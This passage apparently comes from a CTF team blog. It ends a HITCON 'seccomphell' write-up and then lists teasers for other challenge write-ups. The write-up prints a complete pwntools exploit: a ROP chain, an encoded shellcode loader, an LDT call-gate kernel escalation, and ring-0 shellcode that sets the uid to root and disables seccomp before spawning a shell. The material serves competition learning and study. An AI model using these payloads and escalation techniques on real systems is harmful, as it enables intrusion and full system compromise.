⠀⠀⢈⠒⡀⠀⠀⠀⠀⠈⢛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⢀⠐⡀⠀
⣀⢠⠊⢀⠰⠀⠀⠀⠠⢀⠀⢐⡈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠠⠈⡐⠂⠐⡄⢀

This wasn't actually the flag; we need to use our root shell to find it.

Using find / -name '*flag*' 2> /dev/null we find a flag generator, /root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag, which we can execute to get the flag.

while (out := rl().rstrip()) != b'[+] spawning shell' :
  linfo(out.decode())

linfo(out.decode())

linfo("FINAL STAGE")

sl('echo PWND')
# sla('PWND', "find / -name '*flag*' 2> /dev/null")
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()

Improving success rate

After the CTF concluded, I talked with others who solved the challenge and realized why my success rate was so bad: it was the function calls. Inspired by other people's solutions, I rewrote my shellcode without them, which gives a much better success rate.

For privilege escalation we manually edit the cred struct linked from current to become root. Normally there are two pointers, cred and real_cred, but in this scenario they point to the same struct, so we simply set the uid in it to 0.

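Disabling seccomp is more interesting. In thread_info (which sits at the start of task_struct) there is a field called syscall_work that holds flags such as SYSCALL_WORK_SECCOMP, which enables the seccomp check on syscall entry. If we clear that flag, we can execute all syscalls. However, this only affects the current task_struct: as soon as a new process is spawned (e.g. when the shell forks to run a command), the child gets the flag set again as long as seccomp.mode is not SECCOMP_MODE_DISABLED (see copy_seccomp() in kernel/fork.c).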

So additionally we need to set current->seccomp.mode to SECCOMP_MODE_DISABLED.
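The following Python model condenses our (hedged) reading of the v6.9 sources. The syscall entry path only calls into seccomp when SYSCALL_WORK_SECCOMP is set. __secure_computing() then dispatches on seccomp.mode and reaches BUG() for a mode it does not expect; with oops=panic, that likely explains why only zeroing the mode failed. copy_seccomp() re-sets the flag for every child whose inherited mode is not SECCOMP_MODE_DISABLED. Names are simplified and the filter logic itself is left out.

```python
SYSCALL_WORK_SECCOMP = 1 << 0
SECCOMP_MODE_DISABLED, SECCOMP_MODE_STRICT, SECCOMP_MODE_FILTER = 0, 1, 2
SECCOMP_MODE_DEAD = SECCOMP_MODE_FILTER + 1

class Task:
    def __init__(self, syscall_work: int, mode: int):
        self.syscall_work = syscall_work   # thread_info.syscall_work
        self.mode = mode                   # seccomp.mode

def syscall_entry(task: Task) -> str:
    if not task.syscall_work & SYSCALL_WORK_SECCOMP:
        return "no seccomp check"
    if task.mode == SECCOMP_MODE_STRICT:
        return "strict check"
    if task.mode == SECCOMP_MODE_FILTER:
        return "run filters"
    if task.mode == SECCOMP_MODE_DEAD:
        return "task killed"
    raise RuntimeError("kernel BUG()")     # e.g. mode 0 with the flag still set

def fork(parent: Task) -> Task:
    # the child inherits thread_info and seccomp state ...
    child = Task(parent.syscall_work, parent.mode)
    # ... and copy_seccomp() re-arms the flag unless seccomp is disabled
    if child.mode != SECCOMP_MODE_DISABLED:
        child.syscall_work |= SYSCALL_WORK_SECCOMP
    return child

t = Task(SYSCALL_WORK_SECCOMP, SECCOMP_MODE_FILTER)
t.syscall_work &= ~SYSCALL_WORK_SECCOMP               # clear the flag only
print(syscall_entry(t), "|", syscall_entry(fork(t)))  # no seccomp check | run filters
t.mode = SECCOMP_MODE_DISABLED                        # the improved payload does both
print(syscall_entry(t), "|", syscall_entry(fork(t)))  # no seccomp check | no seccomp check
```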

Stage 5.2 (improved):

PTI_SWITCH_MASK=0x1000

# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748
CURRENT=0x34940

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111 
CRED_OFF=0xb80
UID_OFF=8

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
SECCOMP_OFF=0xc68
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10
SECCOMP_MODE_DISABLED = 0

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
SYSCALL_WORK_OFF=0x8
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51
SYSCALL_WORK_SECCOMP=1

ring0 = asm(f"""

  /* PROLOGUE */

  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // get current
  movq r15, qword ptr gs:[{CURRENT}]


  /* PRIVILEGE ESCALATION */

  // current->cred->uid = 0
  mov rax, qword ptr[r15+{CRED_OFF}]
  mov dword ptr[rax+{UID_OFF}], 0


  /* DISABLE SECCOMP */

  // current->thread_info.syscall_work &= ~SYSCALL_WORK_SECCOMP
  and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

  // current->seccomp.mode = SECCOMP_MODE_DISABLED
  mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}


  /* EPILOG */

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  pushfq
  // Set IF in the new RFLAGS (like sti)
  or qword ptr [rsp], {1 << 9}
  pushq r9
  pushq r8
  iretq

""")

Exploit

Flag: hitcon{if_kernel_goes_brrrr_seccomp_filter_becomes_this:https://www.youtube.com/watch?v=nTT2fNyKgUE}

exploit.py:

#!/usr/bin/env python3
from pwn import *

GDB_OFF = 0x555555554000
IP = 'seccomphell.chal.hitconctf.com' if args.REMOTE else 'localhost' 
PORT =  int(sys.argv[1]) if len(sys.argv) >= 2 else 22222

BINARY = './bins/i_am_not_backdoor.bin'
ARGS = []
ENV = {
  'SHLVL':'2', 
  'HOME':'/', 
  'TERM':'linux',
  'PWD':'/',
  'SOCAT_PID':'190',
  'SOCAT_PPID':'189',
  'SOCAT_VERSION':'1.7.3.0',
  'SOCAT_SOCKADDR':'10.0.2.15',
  'SOCAT_SOCKPORT':'22222',
  'SOCAT_PEERADDR':'10.0.2.2',
  'SOCAT_PEERPORT':'54394'
} # os.environ
GDB = f"""
set follow-fork-mode parent

# backdoor
# b * 0x4018dc

# rop start
# b * 0x401d05

# loader
hb * 0x400000

# payload
hb * 0x401000

c"""

context.binary = exe = ELF(BINARY, checksec=False)
# libc = ELF('', checksec=False)
context.aslr = True

cst = constants
shc = shellcraft

linfo = lambda x, *a: log.info(x, *a)
lwarn = lambda x, *a: log.warn(x, *a)
lerror = lambda x, *a: log.error(x, *a)
lprog = lambda x, *a: log.progress(x, *a)

byt = lambda x: x if isinstance(x, bytes) else x.encode() if isinstance(x, str) else repr(x).encode()
phex = lambda x, y='': print(y + hex(x))
lhex = lambda x, y='': linfo(y + hex(x))
pad = lambda x, s=8, v=b'\0', o='r': byt(x).ljust(s, byt(v)) if o == 'r' else byt(x).rjust(s, byt(v))
padhex = lambda x, s=None: pad(hex(x)[2:],((x.bit_length()//8)+1)*2 if s is None else s, b'0', 'l')
upad = lambda x: u64(pad(x))
tob = lambda x: bytes.fromhex(padhex(x).decode())

gelf = lambda elf=None: elf if elf else exe
srh = lambda x, elf=None: gelf(elf).search(byt(x)).__next__()
sasm = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).__next__()
lsrh = lambda x: srh(x, libc)
lasm = lambda x: sasm(x, libc)

cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

t = None
gt = lambda at=None: at if at else t
sl = lambda x, t=None, *a, **kw: gt(t).sendline(byt(x), *a, **kw)
se = lambda x, t=None, *a, **kw: gt(t).send(byt(x), *a, **kw)
ss = lambda x, s, t=None, *a, **kw: sl(x, t, *a, **kw) if len(x) < s else se(x, t, *a, **kw)
sla = lambda x, y, t=None, *a, **kw: gt(t).sendlineafter(byt(x), byt(y), *a, **kw)
sa = lambda x, y, t=None, *a, **kw: gt(t).sendafter(byt(x), byt(y), *a, **kw)
sas = lambda x, y, s, t=None, *a, **kw: sla(x, y, t, *a, **kw) if len(y) < s else sa(x, y, t, *a, **kw)
ra = lambda t=None, *a, **kw: gt(t).recvall(*a, **kw)
rl = lambda t=None, *a, **kw: gt(t).recvline(*a, **kw)
rls = lambda t=None, *a, **kw: rl(t, *a, **kw)[:-1]
re = lambda x, t=None, *a, **kw: gt(t).recv(x, *a, **kw)
ru = lambda x, t=None, *a, **kw: gt(t).recvuntil(byt(x), *a, **kw)
it = lambda t=None, *a, **kw: gt(t).interactive(*a, **kw)
cl = lambda t=None, *a, **kw: gt(t).close(*a, **kw)


vm = None
def get_target(**kw):
  global vm

  if args.REMOTE or args.TEST:
    # context.log_level = 'debug'
    return remote(IP, PORT)

  if args.LOCAL:
    if args.GDB:
      return gdb.debug([BINARY] + ARGS, env=ENV, gdbscript=GDB, **kw)
    return process([BINARY] + ARGS, env=ENV, **kw)

  try:
    from vagd import Dogd, Qegd, Box # only load vagd if needed
  except ImportError:
    log.error("Failed to import vagd, either run locally using LOCAL or install it")
  if not vm:
    vm = Dogd(BINARY, image=Box.DOCKER_JAMMY, ex=True, fast=True)  # Docker
    # vm = Qegd(BINARY, img=Box.QEMU_JAMMY, ex=True, fast=True)  # Qemu
  if vm.is_new:
    log.info("new vagd instance") # additional setup here
  return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)


t = get_target()

#############################################
# STAGE 1: ROP BACKDOOR                     #
#############################################

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b'' 

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
next(sret_gen)
next(sret_gen)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.raw(0x6fe1be2)
rop.rdi = 0x258 
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open 
rop.rsi = cst.O_RDWR
rop.call(SYSCALL_RET)

rop.rsi = PIVOT
# rop.rdx = 0x400
rop.call(0x0000000000428de0)

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(SYSCALL_RET)
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)


#############################################
# STAGE 2: PIVOT ROP                        #
#############################################


linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER 
pivot.rdx = 0x1000
pivot.call(SYSCALL_RET)

pivot.call(LOADER)

pivot.exit(0)

chain = flat({
  0: std,
  0x10: b'STAGE 2',
  0x18: b'STAGE 3',
  0x20: b'FAIL',
  0x100: pivot
})

linfo("pivot len: 0x%x", len(chain))
sleep(1)

sl(chain)

#############################################
# STAGE 5.2: RING 0 PAYLOAD                 #
#############################################

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/


PTI_SWITCH_MASK=0x1000

# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748
CURRENT=0x34940

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111 
CRED_OFF=0xb80
UID_OFF=8

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
SECCOMP_OFF=0xc68
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10
SECCOMP_MODE_DISABLED = 0

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
SYSCALL_WORK_OFF=0x8
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51
SYSCALL_WORK_SECCOMP=1

ring0 = asm(f"""

  /* PROLOGUE */

  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // get current
  movq r15, qword ptr gs:[{CURRENT}]


  /* PRIVILEGE ESCALATION */

  // current->cred->uid = 0
  mov rax, qword ptr[r15+{CRED_OFF}]
  mov dword ptr[rax+{UID_OFF}], 0


  /* DISABLE SECCOMP */

  // current->thread_info.syscall_work &= ~SYSCALL_WORK_SECCOMP
  and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

  // current->seccomp.mode = SECCOMP_MODE_DISABLED
  mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}


  /* EPILOG */

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  pushfq
  // Set IF in the new RFLAGS (like sti)
  or qword ptr [rsp], {1 << 9}
  pushq r9
  pushq r8
  iretq

""")


#############################################
# STAGE 5.1: CALL GATE TRAMPOLIN            #
#############################################

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/

TRAMPOLIN = 0xc00000

MSR_LSTAR=0xc0000082
KASLR_WRITABLE=0xa00000
KASLR_LSTAR=0xa00010
KASRL_WRITABLE_END=0xc00000
KASLR_INIT_TASK=0x1613940
KASLR_WRITE_TO=0xbad000
PERCPU_CURRENT=0x1fbc0

RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute 
trampolin = asm(f"""
  cli

  // Read LSTAR to bypass KASLR
  mov ecx, {MSR_LSTAR}
  rdmsr
  shl rdx, 32
  or rdx, rax
  subq rdx, {KASLR_LSTAR}
  movq rbp, rdx

  // Disable WP
  movq r8, cr0
  andq r8, {(~(1 << 16))}
  movq cr0, r8

  // Copy stage 5.2 to the mapped kernel entry point
  movq rdi, rbp
  addq rdi, {KASLR_WRITE_TO}
  movq r15, rdi
  lea rsi, [rip+RING_0]
  mov ecx, {RING0_LEN}
  rep movsb

  // Jump there.
  jmp r15

  RING_0:
""") + ring0

TRAMPOLIN_LEN = len(trampolin)

#############################################
# STAGE 4: KERNEL BACKDOOR, LDT CALL GATE   #
#############################################

far_func = p64(0x67dead8664)

payload = bytearray(far_func+asm(f"""
  {shc.echo("STAGE 4")}

  {shc.echo("[+] INIT\n")}

  {shc.pushstr("/dev/i_am_definitely_not_backdoor")}
  {shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
  cmp rax, 0
  jl FAIL

  mov rbx, rax
  {shc.echo("[+] backdoor fd: ")}
  {shc.itoa('rbx')}
  {shc.strlen('rsp')}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

  {shc.echo("\n[+] START\n")}

  // disable SMAP
  {shc.echo("[+] 'stac' in CPL3\n")}
  pushfq
  or         QWORD PTR [rsp],0x40000
  popfq

  {shc.echo("[+] modify_ldt user\n")}
  mov        rax, 0x100001000
  push       rax
  mov        rax, 0x100000000c
  push       rax
  mov        rsi, rsp

  {shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

  {shc.echo("[+] modify_ldt high\n")}

  mov        rax, 0x380000FFFF
  push       rax
  mov        rax, 0xFFFF0000000E
  push       rax
  mov        rsi, rsp

  {shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

  {shc.echo("[+] write to backdoor\n")}
  {shc.pushstr('TEST')}
  mov rsi, rsp
  {shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] cpy trampolin\n")}
  {shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
  lea rsi, [rip+TRAMPOLIN]
  {shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

  // far call through the CALL GATE for privilege escalation
  {shc.echo("[+] go to CPL 0\n")}
  call   FWORD PTR ds:{PIVOT-0xa6b00}

  // should be root
  {shc.echo("[+] spawning shell\n")}
  {shc.sh()}
  jmp FAIL


FAIL:
  mov rbx, rax
  neg rbx
  {shc.echo("[-] errno: ")}
  {shc.itoa('rbx')}
  {shc.strlen('rsp')}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
  {shc.echo("\n[-] FAIL\n")}
  int 3

TRAMPOLIN:
""") + trampolin).ljust(0x500, asm('nop'))


#############################################
# STAGE 3: LOAD ENCODED PAYLOAD             #
#############################################

PAYLOAD = 0x401000
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
  xor rbx, rbx
LOAD:
  // get two characters (one byte)
  push 0
  {shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
  cmp rax, 2
  jl FAIL
  pop rax
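  sub ah, 0x41
  sub al, 0x41
  // a single `shl al, 4` / `shr rax, 4` would encode a 0x04 immediate,
  // which the bad-char assert below forbids, hence two shifts by 2 each
  shl al, 2
  shl al, 2
  shr rax, 2
  shr rax, 2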
  mov BYTE PTR [rbx+{PAYLOAD}], al
  inc rbx
  cmp rbx, {PAYLOAD_LEN}
  jb LOAD

  // jmp to next stage
  mov rax, {PAYLOAD+0x8}
  jmp rax

FAIL:
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
  int 3
"""))

assert all(bad not in loader for bad in b"\x04\n"), "can't have certain escape chars"

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
#  hex digits starting at 'A' ('A' = 0x0 ... 'P' = 0xf)
#  and least significant nibble first

payload_enc = b''
for b in payload:
  lo = (b & 0xf) + 0x41
  hi = ((b & 0xf0) >> 4) + 0x41
  payload_enc += bytes((lo, hi))


linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

ru("STAGE 4")

context.newline = b'\r\n'

while (out := rl().rstrip()) != b'[+] spawning shell' :
  linfo(out.decode())

linfo(out.decode())

#############################################
# FINAL STAGE: GET FLAG                     #
#############################################

linfo("FINAL STAGE")

sl('echo PWND')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')


it() # or t.interactive()
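The custom payload encoding from stage 3 can be checked in isolation with a small Python round trip. `encode` mirrors the loop in exploit.py. `decode` is our own re-implementation of what the loader computes in assembly: subtract 'A', shift the low nibble up by 4, then shift the 16-bit value down by 4. Every encoded byte falls in 'A'..'P', so no newline or other control character can reach the terminal.

```python
def encode(payload: bytes) -> bytes:
    # each byte -> two letters 'A'..'P': low nibble first, then high nibble
    out = bytearray()
    for b in payload:
        out += bytes(((b & 0xF) + 0x41, (b >> 4) + 0x41))
    return bytes(out)

def decode(data: bytes) -> bytes:
    # per pair: al = lo - 'A', ah = hi - 'A', al <<= 4, then
    # (ax >> 4) & 0xff yields (hi << 4) | lo, as in the loader
    out = bytearray()
    for i in range(0, len(data), 2):
        lo, hi = data[i] - 0x41, data[i + 1] - 0x41
        ax = (hi << 8) | ((lo << 4) & 0xFF)
        out.append((ax >> 4) & 0xFF)
    return bytes(out)

sample = bytes([0x00, 0x0A, 0x04, 0xC3, 0xFF])
enc = encode(sample)
print(enc)                      # b'AAKAEADMPP'
assert decode(enc) == sample
```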

FAUST CTF 2023 - image-galoisry

Thu 05 October 2023 • Hetti, jalaka • writeup

AES Oracle meets OCR

Introduction The service image-galoisry is a flask web server accompanied by a web GUI. On the website, users can create new image galleries, which are safeguarded by a password. Following gallery creation, users have the option to upload images, with each image undergoing encryption with AES. Notably, these galleries, while publicly accessible, only display encrypted files for download. However, should a user possess the password for a specific gallery, they have the option to instruct the...

Google CTF 2023 - oldschool

Tue 18 July 2023 • cluosh, gmerz • writeup

Write an oldschool keygen for an oldschool login interface.

Google CTF 2022 presented us with oldschool, a typical, as the name suggests, oldschool crackme with an ncurses terminal interface. The goal of the challenge was to write a keygen, which would be able to generate keys for a list of users provided by the CTF organizers. The official and detailed writeup is available here, which goes through the intended solution of manually reverse engineering the key verification algorithm. However, since we are researchers (and most importantly, too lazy to manually...

DiceCTF 2023 - chess.rs

Sun 05 February 2023 • 0x6fe1be2, cluosh, fkehrer, lavish • writeup

🚀 blazingfast rust wasm chess 🚀

TL;DR chess.rs is a pwn(/web) challenge using Rust with WebAssembly. The goal is to extract the cookies of the admin browser bot. We have a rust webserver providing two pages index.html (graphical frontend) and engine.html ("backend", runs the wasm logic). index.html loads engine.html as an iframe. They send messages through .postMessage and receive them through the window.onmessage event listener. There is a hidden parameter in the init function on engine.html that allows setting a custom board position...

CInsects CTF 2022 - catclub

Mon 14 March 2022 • jalaka • writeup

Trick Captcha to believe a dog is actually a cat and let it into the catclub

The challenge catclub is written in Python and offers the service shadymail that can be accessed after an image captcha is solved and the hidden catclub page where various pictures of random cats can be seen. Service Overview The home page which consists of a captcha where all images of a specific animal must be selected to proceed.(/) The shadymail service which can be accessed after completing a captcha (/shadymail/home) The catclub page where random cat images from the...

DCTF 2021 - Just In Time

Mon 17 May 2021 • lehrbaum • writeup

Using frida to get decrypted flag.

Description Don't fall in (rabbit) holes Preface We get a binary which just prints Decryption finished. Overview Using ghidra, we can analyse the binary. Inside the main of the binary we can see that there is some binary content and multiple functions called with strncpy in between. undefined8 main(int argc,char **argv) { char *key_text; char

DCTF 2021 - Pinch me

Mon 17 May 2021 • lehrbaum • writeup

Buffer overflow to overwrite variable

Description This should be easy! nc dctf1-chall-pinch-me.westeurope.azurecontainer.io 7480 Preface We got a binary file which asked us Am I dreaming? and with basic input prints then Pinch me! Overview Loading the binary into ghidra we can see, that the interaction happens in the function vuln void vuln(void) { char local_28 [24]; int local_10; int local_c

DCTF 2021 - Baby bof

Mon 17 May 2021 • lehrbaum • writeup

Buffer overflow and ret2libc

Description It's just another bof. nc dctf-chall-baby-bof.westeurope.azurecontainer.io 7481 Preface We got a simple binary with output plz don't rop me and after our input plz don't rop me Also we got a Dockerfile, which showed us the used image was Ubuntu:20.04 Overview Based on the output, we know it was a rop challenge. Also checksec baby_bof gave us. Arch: amd64-64-little RELRO: Partial RELRO

DCTF 2021 - Pwn sanity check

Mon 17 May 2021 • lehrbaum • writeup

Simple buffer overflow with ret2win.

Description This should take about 1337 seconds to solve. nc dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io 7480 Preface We get a simple binary, with simple input and output. Overview Looking at the binary in ghidra, I found these functions. void vuln(void) { char local_48 [60]; int local_c; puts("tell me a joke"); fgets(local_48,0x100

DCTF 2021 - Readme

Mon 17 May 2021 • lehrbaum • writeup

Format String to dump the memory and get flag.

Description Read me to get the flag. nc dctf-chall-readme.westeurope.azurecontainer.io 7481 Preface We get a binary which asks for our name and then prints hello + input. But in order for the binary to run, a file flag.txt needs to be created in the working directory. Overview Decompiling the binary in ghidra, we see a function vuln where the logic happens. The decompiled function with some renaming of the variables looks like this: void vuln(void) {
